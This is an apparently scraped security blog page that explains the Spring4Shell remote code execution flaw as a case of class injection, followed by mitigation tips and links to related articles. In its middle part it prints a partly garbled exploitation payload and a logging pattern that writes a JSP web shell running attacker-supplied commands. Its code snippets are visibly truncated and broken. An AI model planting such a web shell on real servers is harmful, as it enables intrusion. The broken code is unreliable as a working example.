Spring4Shell as a class injection example

Two serious vulnerabilities leading to remote code execution (RCE) have been found in the popular Spring framework, one in Spring Core and the other in Spring Cloud Functions.

schedule a call

Credit: LunaSec

$ curl ''
$ # wait, what?

ModelAttribute example:

public class Greeting {  
	private long id;  
	public long getId() {  
		return id;  
	public void setId(long id) { = id;  
public class HelloController {  
	public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {  
		return "hello";  

Class injection exploitation example:!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di  

a series of requests result in the creation of shell.jsp log with the following logging pattern:

%{prefix}i in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((!=-1){ out.println(new String(b)); } %{suffix}i


  • do not use deserialization
  • do not ever allow passing serialized data as arguments
  • research how your parsers treat object creation, metadata and language extensions
  • validate user input

Insecure deserialization

Insecure deserialization is when user-controllable data is deserialised by a website. This potentially enables an attacker to manipulate serialised objects… Read more

JNDI injection

Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and… Read more